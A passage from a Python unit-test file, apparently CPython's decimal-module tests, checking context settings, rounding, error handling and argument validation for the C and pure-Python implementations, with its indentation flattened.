c = MyContext(capitals=0)
self.assertEqual(c.capitals, 0)
x = c.create_decimal('1E222')
self.assertEqual(c.to_sci_string(x), '1e+222')
# clamp
self.assertRaises(ValueError, MyContext, **{'clamp':2})
c = MyContext(clamp=1, Emax=99)
self.assertEqual(c.clamp, 1)
x = c.plus(Decimal('1e99'))
self.assertEqual(str(x), '1.000000000000000000000000000E+99')
# flags
self.assertRaises(TypeError, MyContext, **{'flags':'XYZ'})
c = MyContext(flags=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.flags[signal])
c.clear_flags()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.flags[signal])
# traps
self.assertRaises(TypeError, MyContext, **{'traps':'XYZ'})
c = MyContext(traps=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.traps[signal])
c.clear_traps()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.traps[signal])
class CContextSubclassing(ContextSubclassing):
decimal = C
class PyContextSubclassing(ContextSubclassing):
decimal = P
@skip_if_extra_functionality
class CheckAttributes(unittest.TestCase):
def test_module_attributes(self):
# Architecture dependent context limits
self.assertEqual(C.MAX_PREC, P.MAX_PREC)
self.assertEqual(C.MAX_EMAX, P.MAX_EMAX)
self.assertEqual(C.MIN_EMIN, P.MIN_EMIN)
self.assertEqual(C.MIN_ETINY, P.MIN_ETINY)
self.assertTrue(C.HAVE_THREADS is True or C.HAVE_THREADS is False)
self.assertTrue(P.HAVE_THREADS is True or P.HAVE_THREADS is False)
self.assertEqual(C.__version__, P.__version__)
self.assertEqual(dir(C), dir(P))
def test_context_attributes(self):
x = [s for s in dir(C.Context()) if '__' in s or not s.startswith('_')]
y = [s for s in dir(P.Context()) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
def test_decimal_attributes(self):
x = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
y = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
class Coverage(unittest.TestCase):
def test_adjusted(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal('1234e9999').adjusted(), 10002)
# XXX raise?
self.assertEqual(Decimal('nan').adjusted(), 0)
self.assertEqual(Decimal('inf').adjusted(), 0)
def test_canonical(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
x = Decimal(9).canonical()
self.assertEqual(x, 9)
c = getcontext()
x = c.canonical(Decimal(9))
self.assertEqual(x, 9)
def test_context_repr(self):
c = self.decimal.DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[self.decimal]:
c.flags[sig] = False
c.traps[sig] = False
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[], traps=[])"
self.assertEqual(s, t)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
# abs
self.assertEqual(abs(Decimal("-10")), 10)
# add
self.assertEqual(Decimal("7") + 1, 8)
# divide
self.assertEqual(Decimal("10") / 5, 2)
# divide_int
self.assertEqual(Decimal("10") // 7, 1)
# fma
self.assertEqual(Decimal("1.2").fma(Decimal("0.01"), 1), 1)
self.assertIs(Decimal("NaN").fma(7, 1).is_nan(), True)
# three arg power
self.assertEqual(pow(Decimal(10), 2, 7), 2)
# exp
self.assertEqual(Decimal("1.01").exp(), 3)
# is_normal
self.assertIs(Decimal("0.01").is_normal(), False)
# is_subnormal
self.assertIs(Decimal("0.01").is_subnormal(), True)
# ln
self.assertEqual(Decimal("20").ln(), 3)
# log10
self.assertEqual(Decimal("20").log10(), 1)
# logb
self.assertEqual(Decimal("580").logb(), 2)
# logical_invert
self.assertEqual(Decimal("10").logical_invert(), 1)
# minus
self.assertEqual(-Decimal("-10"), 10)
# multiply
self.assertEqual(Decimal("2") * 4, 8)
# next_minus
self.assertEqual(Decimal("10").next_minus(), 9)
# next_plus
self.assertEqual(Decimal("10").next_plus(), Decimal('2E+1'))
# normalize
self.assertEqual(Decimal("-10").normalize(), Decimal('-1E+1'))
# number_class
self.assertEqual(Decimal("10").number_class(), '+Normal')
# plus
self.assertEqual(+Decimal("-1"), -1)
# remainder
self.assertEqual(Decimal("10") % 7, 3)
# subtract
self.assertEqual(Decimal("10") - 7, 3)
# to_integral_exact
self.assertEqual(Decimal("1.12345").to_integral_exact(), 1)
# Boolean functions
self.assertTrue(Decimal("1").is_canonical())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("snan").is_snan())
self.assertTrue(Decimal("-1").is_signed())
self.assertTrue(Decimal("0").is_zero())
self.assertTrue(Decimal("0").is_zero())
# Copy
with localcontext() as c:
c.prec = 10000
x = 1228 ** 1523
y = -Decimal(x)
z = y.copy_abs()
self.assertEqual(z, x)
z = y.copy_negate()
self.assertEqual(z, x)
z = y.copy_sign(Decimal(1))
self.assertEqual(z, x)
def test_divmod(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
with localcontext() as c:
q, r = divmod(Decimal("10912837129"), 1001)
self.assertEqual(q, Decimal('10901935'))
self.assertEqual(r, Decimal('194'))
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
c.clear_flags()
q, r = divmod(Decimal("inf"), Decimal("inf"))
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal("inf"), 101)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal(0), 0)
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.traps[DivisionByZero] = False
c.clear_flags()
q, r = divmod(Decimal(11), 0)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation] and
c.flags[DivisionByZero])
def test_power(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
Overflow = self.decimal.Overflow
Rounded = self.decimal.Rounded
with localcontext() as c:
c.prec = 3
c.clear_flags()
self.assertEqual(Decimal("1.0") ** 100, Decimal('1.00'))
self.assertTrue(c.flags[Rounded])
c.prec = 1
c.Emax = 1
c.Emin = -1
c.clear_flags()
c.traps[Overflow] = False
self.assertEqual(Decimal(10000) ** Decimal("0.5"), Decimal('inf'))
self.assertTrue(c.flags[Overflow])
def test_quantize(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
c.traps[InvalidOperation] = False
x = Decimal(99).quantize(Decimal("1e1"))
self.assertTrue(x.is_nan())
def test_radix(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
self.assertEqual(Decimal("1").radix(), 10)
self.assertEqual(c.radix(), 10)
def test_rop(self):
Decimal = self.decimal.Decimal
for attr in ('__radd__', '__rsub__', '__rmul__', '__rtruediv__',
'__rdivmod__', '__rmod__', '__rfloordiv__', '__rpow__'):
self.assertIs(getattr(Decimal("1"), attr)("xyz"), NotImplemented)
def test_round(self):
# Python3 behavior: round() returns Decimal
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 28
self.assertEqual(str(Decimal("9.99").__round__()), "10")
self.assertEqual(str(Decimal("9.99e-5").__round__()), "0")
self.assertEqual(str(Decimal("1.23456789").__round__(5)), "1.23457")
self.assertEqual(str(Decimal("1.2345").__round__(10)), "1.2345000000")
self.assertEqual(str(Decimal("1.2345").__round__(-10)), "0E+10")
self.assertRaises(TypeError, Decimal("1.23").__round__, "5")
self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8)
def test_create_decimal(self):
c = self.decimal.Context()
self.assertRaises(ValueError, c.create_decimal, ["%"])
def test_int(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 9999
x = Decimal(1221**1271) / 10**3923
self.assertEqual(int(x), 1)
self.assertEqual(x.to_integral(), 2)
def test_copy(self):
Context = self.decimal.Context
c = Context()
c.prec = 10000
x = -(1172 ** 1712)
y = c.copy_abs(x)
self.assertEqual(y, -x)
y = c.copy_negate(x)
self.assertEqual(y, -x)
y = c.copy_sign(x, 1)
self.assertEqual(y, -x)
class CCoverage(Coverage):
decimal = C
class PyCoverage(Coverage):
decimal = P
class PyFunctionality(unittest.TestCase):
"""Extra functionality in decimal.py"""
def test_py_alternate_formatting(self):
# triples giving a format, a Decimal, and the expected result
Decimal = P.Decimal
localcontext = P.localcontext
test_values = [
# Issue 7094: Alternate formatting (specified by #)
('.0e', '1.0', '1e+0'),
('#.0e', '1.0', '1.e+0'),
('.0f', '1.0', '1'),
('#.0f', '1.0', '1.'),
('g', '1.1', '1.1'),
('#g', '1.1', '1.1'),
('.0g', '1', '1'),
('#.0g', '1', '1.'),
('.0%', '1.0', '100%'),
('#.0%', '1.0', '100.%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
class PyWhitebox(unittest.TestCase):
"""White box testing for decimal.py"""
def test_py_exact_power(self):
# Rarely exercised lines in _power_exact.
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
c.prec = 8
x = Decimal(2**16) ** Decimal("-0.5")
self.assertEqual(x, Decimal('0.00390625'))
x = Decimal(2**16) ** Decimal("-0.6")
self.assertEqual(x, Decimal('0.0012885819'))
x = Decimal("256e7") ** Decimal("-0.5")
x = Decimal(152587890625) ** Decimal('-0.0625')
self.assertEqual(x, Decimal("0.2"))
x = Decimal("152587890625e7") ** Decimal('-0.0625')
x = Decimal(5**2659) ** Decimal('-0.0625')
c.prec = 1
x = Decimal("152587890625") ** Decimal('-0.5')
c.prec = 201
x = Decimal(2**578) ** Decimal("-0.5")
def test_py_immutability_operations(self):
# Do operations and check that it didn't change internal objects.
Decimal = P.Decimal
DefaultContext = P.DefaultContext
setcontext = P.setcontext
c = DefaultContext.copy()
c.traps = dict((s, 0) for s in OrderedSignals[P])
setcontext(c)
d1 = Decimal('-25e55')
b1 = Decimal('-25e55')
d2 = Decimal('33e+33')
b2 = Decimal('33e+33')
def checkSameDec(operation, useOther=False):
if useOther:
eval("d1." + operation + "(d2)")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
self.assertEqual(d2._sign, b2._sign)
self.assertEqual(d2._int, b2._int)
self.assertEqual(d2._exp, b2._exp)
else:
eval("d1." + operation + "()")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
Decimal(d1)
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
checkSameDec("__abs__")
checkSameDec("__add__", True)
checkSameDec("__divmod__", True)
checkSameDec("__eq__", True)
checkSameDec("__ne__", True)
checkSameDec("__le__", True)
checkSameDec("__lt__", True)
checkSameDec("__ge__", True)
checkSameDec("__gt__", True)
checkSameDec("__float__")
checkSameDec("__floordiv__", True)
checkSameDec("__hash__")
checkSameDec("__int__")
checkSameDec("__trunc__")
checkSameDec("__mod__", True)
checkSameDec("__mul__", True)
checkSameDec("__neg__")
checkSameDec("__bool__")
checkSameDec("__pos__")
checkSameDec("__pow__", True)
checkSameDec("__radd__", True)
checkSameDec("__rdivmod__", True)
checkSameDec("__repr__")
checkSameDec("__rfloordiv__", True)
checkSameDec("__rmod__", True)
checkSameDec("__rmul__", True)
checkSameDec("__rpow__", True)
checkSameDec("__rsub__", True)
checkSameDec("__str__")
checkSameDec("__sub__", True)
checkSameDec("__truediv__", True)
checkSameDec("adjusted")
checkSameDec("as_tuple")
checkSameDec("compare", True)
checkSameDec("max", True)
checkSameDec("min", True)
checkSameDec("normalize")
checkSameDec("quantize", True)
checkSameDec("remainder_near", True)
checkSameDec("same_quantum", True)
checkSameDec("sqrt")
checkSameDec("to_eng_string")
checkSameDec("to_integral")
def test_py_decimal_id(self):
Decimal = P.Decimal
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
self.assertNotEqual(id(d), id(e))
def test_py_rescale(self):
# Coverage
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
x = Decimal("NaN")._rescale(3, ROUND_UP)
self.assertTrue(x.is_nan())
def test_py__round(self):
# Coverage
Decimal = P.Decimal
self.assertRaises(ValueError, Decimal("3.1234")._round, 0, ROUND_UP)
class CFunctionality(unittest.TestCase):
"""Extra functionality in _decimal"""
@requires_extra_functionality
def test_c_ieee_context(self):
# issue 8786: Add support for IEEE 754 contexts to decimal module.
IEEEContext = C.IEEEContext
DECIMAL32 = C.DECIMAL32
DECIMAL64 = C.DECIMAL64
DECIMAL128 = C.DECIMAL128
def assert_rest(self, context):
self.assertEqual(context.clamp, 1)
assert_signals(self, context, 'traps', [])
assert_signals(self, context, 'flags', [])
c = IEEEContext(DECIMAL32)
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 96)
self.assertEqual(c.Emin, -95)
assert_rest(self, c)
c = IEEEContext(DECIMAL64)
self.assertEqual(c.prec, 16)
self.assertEqual(c.Emax, 384)
self.assertEqual(c.Emin, -383)
assert_rest(self, c)
c = IEEEContext(DECIMAL128)
self.assertEqual(c.prec, 34)
self.assertEqual(c.Emax, 6144)
self.assertEqual(c.Emin, -6143)
assert_rest(self, c)
# Invalid values
self.assertRaises(OverflowError, IEEEContext, 2**63)
self.assertRaises(ValueError, IEEEContext, -1)
self.assertRaises(ValueError, IEEEContext, 1024)
@requires_extra_functionality
def test_c_context(self):
Context = C.Context
c = Context(flags=C.DecClamped, traps=C.DecRounded)
self.assertEqual(c._flags, C.DecClamped)
self.assertEqual(c._traps, C.DecRounded)
@requires_extra_functionality
def test_constants(self):
# Condition flags
cond = (
C.DecClamped, C.DecConversionSyntax, C.DecDivisionByZero,
C.DecDivisionImpossible, C.DecDivisionUndefined,
C.DecFpuError, C.DecInexact, C.DecInvalidContext,
C.DecInvalidOperation, C.DecMallocError,
C.DecFloatOperation, C.DecOverflow, C.DecRounded,
C.DecSubnormal, C.DecUnderflow
)
# IEEEContext
self.assertEqual(C.DECIMAL32, 32)
self.assertEqual(C.DECIMAL64, 64)
self.assertEqual(C.DECIMAL128, 128)
self.assertEqual(C.IEEE_CONTEXT_MAX_BITS, 512)
# Conditions
for i, v in enumerate(cond):
self.assertEqual(v, 1<<i)
self.assertEqual(C.DecIEEEInvalidOperation,
C.DecConversionSyntax|
C.DecDivisionImpossible|
C.DecDivisionUndefined|
C.DecFpuError|
C.DecInvalidContext|
C.DecInvalidOperation|
C.DecMallocError)
self.assertEqual(C.DecErrors,
C.DecIEEEInvalidOperation|
C.DecDivisionByZero)
self.assertEqual(C.DecTraps,
C.DecErrors|C.DecOverflow|C.DecUnderflow)
class CWhitebox(unittest.TestCase):
"""Whitebox testing for _decimal"""
def test_bignum(self):
# Not exactly whitebox, but too slow with pydecimal.
Decimal = C.Decimal
localcontext = C.localcontext
b1 = 10**35
b2 = 10**36
with localcontext() as c:
c.prec = 1000000
for i in range(5):
a = random.randrange(b1, b2)
b = random.randrange(1000, 1200)
x = a ** b
y = Decimal(a) ** Decimal(b)
self.assertEqual(x, y)
def test_invalid_construction(self):
self.assertRaises(TypeError, C.Decimal, 9, "xyz")
def test_c_input_restriction(self):
# Too large for _decimal to be converted exactly
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
Context = C.Context
localcontext = C.localcontext
with localcontext(Context()):
self.assertRaises(InvalidOperation, Decimal,
"1e9999999999999999999")
def test_c_context_repr(self):
# This test is _decimal-only because flags are not printed
# in the same order.
DefaultContext = C.DefaultContext
FloatOperation = C.FloatOperation
c = DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[C]:
c.flags[sig] = True
c.traps[sig] = True
c.flags[FloatOperation] = True
c.traps[FloatOperation] = True
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow], " \
"traps=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow])"
self.assertEqual(s, t)
def test_c_context_errors(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
FloatOperation = C.FloatOperation
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# SignalDict: input validation
self.assertRaises(KeyError, c.flags.__setitem__, 801, 0)
self.assertRaises(KeyError, c.traps.__setitem__, 801, 0)
self.assertRaises(ValueError, c.flags.__delitem__, Overflow)
self.assertRaises(ValueError, c.traps.__delitem__, InvalidOperation)
self.assertRaises(TypeError, setattr, c, 'flags', ['x'])
self.assertRaises(TypeError, setattr, c,'traps', ['y'])
self.assertRaises(KeyError, setattr, c, 'flags', {0:1})
self.assertRaises(KeyError, setattr, c, 'traps', {0:1})
# Test assignment from a signal dict with the correct length but
# one invalid key.
d = c.flags.copy()
del d[FloatOperation]
d["XYZ"] = 91283719
self.assertRaises(KeyError, setattr, c, 'flags', d)
self.assertRaises(KeyError, setattr, c, 'traps', d)
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
gt_max_emax = 10**18 if HAVE_CONFIG_64 else 10**9
# prec, Emax, Emin
for attr in ['prec', 'Emax']:
self.assertRaises(ValueError, setattr, c, attr, gt_max_emax)
self.assertRaises(ValueError, setattr, c, 'Emin', -gt_max_emax)
# prec, Emax, Emin in context constructor
self.assertRaises(ValueError, Context, prec=gt_max_emax)
self.assertRaises(ValueError, Context, Emax=gt_max_emax)
self.assertRaises(ValueError, Context, Emin=-gt_max_emax)
# Overflow in conversion
self.assertRaises(OverflowError, Context, prec=int_max+1)
self.assertRaises(OverflowError, Context, Emax=int_max+1)
self.assertRaises(OverflowError, Context, Emin=-int_max-2)
self.assertRaises(OverflowError, Context, clamp=int_max+1)
self.assertRaises(OverflowError, Context, capitals=int_max+1)
# OverflowError, general ValueError
for attr in ('prec', 'Emin', 'Emax', 'capitals', 'clamp'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, attr, int_max)
self.assertRaises(ValueError, setattr, c, attr, -int_max-1)
# OverflowError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(OverflowError, getattr(c, '_unsafe_setprec'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemax'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemin'),
-int_max-2)
# ValueError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 0)
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), -1)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'),
-1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), 1)
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, attr, 2**32)
self.assertRaises(ValueError, setattr, c, attr, 2**32+1)
# Invalid local context
self.assertRaises(TypeError, exec, 'with localcontext("xyz"): pass',
locals())
self.assertRaises(TypeError, exec,
'with localcontext(context=getcontext()): pass',
locals())
# setcontext
saved_context = getcontext()
self.assertRaises(TypeError, setcontext, "xyz")
setcontext(saved_context)
def test_rounding_strings_interned(self):
self.assertIs(C.ROUND_UP, P.ROUND_UP)
self.assertIs(C.ROUND_DOWN, P.ROUND_DOWN)
self.assertIs(C.ROUND_CEILING, P.ROUND_CEILING)
self.assertIs(C.ROUND_FLOOR, P.ROUND_FLOOR)
self.assertIs(C.ROUND_HALF_UP, P.ROUND_HALF_UP)
self.assertIs(C.ROUND_HALF_DOWN, P.ROUND_HALF_DOWN)
self.assertIs(C.ROUND_HALF_EVEN, P.ROUND_HALF_EVEN)
self.assertIs(C.ROUND_05UP, P.ROUND_05UP)
@requires_extra_functionality
def test_c_context_errors_extra(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
# OverflowError, general ValueError
self.assertRaises(OverflowError, setattr, c, '_allcr', int_max+1)
self.assertRaises(OverflowError, setattr, c, '_allcr', -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, '_allcr', int_max)
self.assertRaises(ValueError, setattr, c, '_allcr', -int_max-1)
# OverflowError, general TypeError
for attr in ('_flags', '_traps'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(TypeError, setattr, c, attr, int_max)
self.assertRaises(TypeError, setattr, c, attr, -int_max-1)
# _allcr
self.assertRaises(ValueError, setattr, c, '_allcr', -1)
self.assertRaises(ValueError, setattr, c, '_allcr', 2)
self.assertRaises(TypeError, setattr, c, '_allcr', [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32)
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32+1)
# _flags, _traps
for attr in ['_flags', '_traps']:
self.assertRaises(TypeError, setattr, c, attr, 999999)
self.assertRaises(TypeError, setattr, c, attr, 'x')
def test_c_valid_context(self):
# These tests are for code coverage in _decimal.
DefaultContext = C.DefaultContext
Clamped = C.Clamped
Underflow = C.Underflow
Inexact = C.Inexact
Rounded = C.Rounded
Subnormal = C.Subnormal
c = DefaultContext.copy()
# Exercise all getters and setters
c.prec = 34
c.rounding = ROUND_HALF_UP
c.Emax = 3000
c.Emin = -3000
c.capitals = 1
c.clamp = 0
self.assertEqual(c.prec, 34)
self.assertEqual(c.rounding, ROUND_HALF_UP)
self.assertEqual(c.Emin, -3000)
self.assertEqual(c.Emax, 3000)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
self.assertEqual(c.Etiny(), -3033)
self.assertEqual(c.Etop(), 2967)
# Exercise all unsafe setters
if C.MAX_PREC == 425000000:
c._unsafe_setprec(999999999)
c._unsafe_setemax(999999999)
c._unsafe_setemin(-999999999)
self.assertEqual(c.prec, 999999999)
self.assertEqual(c.Emax, 999999999)
self.assertEqual(c.Emin, -999999999)
@requires_extra_functionality
def test_c_valid_context_extra(self):
DefaultContext = C.DefaultContext
c = DefaultContext.copy()
self.assertEqual(c._allcr, 1)
c._allcr = 0
self.assertEqual(c._allcr, 0)
def test_c_round(self):
# Restricted input.
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
localcontext = C.localcontext
MAX_EMAX = C.MAX_EMAX
MIN_ETINY = C.MIN_ETINY
int_max = 2**63-1 if C.MAX_PREC > 425000000 else 2**31-1
with localcontext() as c:
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
-int_max-1)
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
int_max)
self.assertRaises(InvalidOperation, Decimal("1").__round__,
int(MAX_EMAX+1))
self.assertRaises(C.InvalidOperation, Decimal("1").__round__,
-int(MIN_ETINY-1))
self.assertRaises(OverflowError, Decimal("1.23").__round__,
-int_max-2)
self.assertRaises(OverflowError, Decimal("1.23").__round__,
int_max+1)
def test_c_format(self):
# Restricted input
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", [], 9)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", 9)
self.assertRaises(TypeError, Decimal(1).__format__, [])
self.assertRaises(ValueError, Decimal(1).__format__, "<>=10.10")
maxsize = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
self.assertRaises(ValueError, Decimal("1.23456789").__format__,
"=%d.1" % maxsize)
def test_c_integral(self):
Decimal = C.Decimal
Inexact = C.Inexact
localcontext = C.localcontext
x = Decimal(10)
self.assertEqual(x.to_integral(), 10)
self.assertRaises(TypeError, x.to_integral, '10')
self.assertRaises(TypeError, x.to_integral, 10, 'x')
self.assertRaises(TypeError, x.to_integral, 10)
self.assertEqual(x.to_integral_value(), 10)
self.assertRaises(TypeError, x.to_integral_value, '10')
self.assertRaises(TypeError, x.to_integral_value, 10, 'x')
self.assertRaises(TypeError, x.to_integral_value, 10)
self.assertEqual(x.to_integral_exact(), 10)
self.assertRaises(TypeError, x.to_integral_exact, '10')
self.assertRaises(TypeError, x.to_integral_exact, 10, 'x')
self.assertRaises(TypeError, x.to_integral_exact, 10)
with localcontext() as c:
x = Decimal("99999999999999999999999999.9").to_integral_value(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
x = Decimal("99999999999999999999999999.9").to_integral_exact(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
c.traps[Inexact] = True
self.assertRaises(Inexact, Decimal("999.9").to_integral_exact, ROUND_UP)
def test_c_funcs(self):
# Invalid arguments
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
getcontext = C.getcontext
localcontext = C.localcontext
self.assertEqual(Decimal('9.99e10').to_eng_string(), '99.9E+9')
self.assertRaises(TypeError, pow, Decimal(1), 2, "3")
self.assertRaises(TypeError, Decimal(9).number_class, "x", "y")
self.assertRaises(TypeError, Decimal(9).same_quantum, 3, "x", "y")
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), []
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), getcontext()
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), 10
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), ROUND_UP, 1000
)
with localcontext() as c:
c.clear_traps()
# Invalid arguments
self.assertRaises(TypeError, c.copy_sign, Decimal(1), "x", "y")
self.assertRaises(TypeError, c.canonical, 200)
self.assertRaises(TypeError, c.is_canonical, 200)
self.assertRaises(TypeError, c.divmod, 9, 8, "x", "y")
self.assertRaises(TypeError, c.same_quantum, 9, 3, "x", "y")
self.assertEqual(str(c.canonical(Decimal(200))), '200')
self.assertEqual(c.radix(), 10)
c.traps[DivisionByZero] = True
self.assertRaises(DivisionByZero, Decimal(9).__divmod__, 0)
self.assertRaises(DivisionByZero, c.divmod, 9, 0)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal(9).__divmod__, 0)
self.assertRaises(InvalidOperation, c.divmod, 9, 0)
self.assertTrue(c.flags[DivisionByZero])
c.traps[InvalidOperation] = True
c.prec = 2
self.assertRaises(InvalidOperation, pow, Decimal(1000), 1, 501)
def test_va_args_exceptions(self):
Decimal = C.Decimal
Context = C.Context
x = Decimal("10001111111")
for attr in ['exp', 'is_normal', 'is_subnormal', 'ln', 'log10',
'logb', 'logical_invert', 'next_minus', 'next_plus',
'normalize', 'number_class', 'sqrt', 'to_eng_string']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
for attr in ['compare', 'compare_signal', 'logical_and',
'logical_or', 'max', 'max_mag', 'min', 'min_mag',
'remainder_near', 'rotate', 'scaleb', 'shift']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
self.assertRaises(TypeError, x.to_integral, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral, [], [])
self.assertRaises(TypeError, x.to_integral_value, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_value, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_value, [], [])
self.assertRaises(TypeError, x.to_integral_exact, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_exact, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_exact, [], [])
self.assertRaises(TypeError, x.fma, 1, 2, context="x")
self.assertRaises(TypeError, x.fma, 1, 2, "x", context=None)
self.assertRaises(TypeError, x.quantize, 1, [], context=None)
self.assertRaises(TypeError, x.quantize, 1, [], rounding=None)
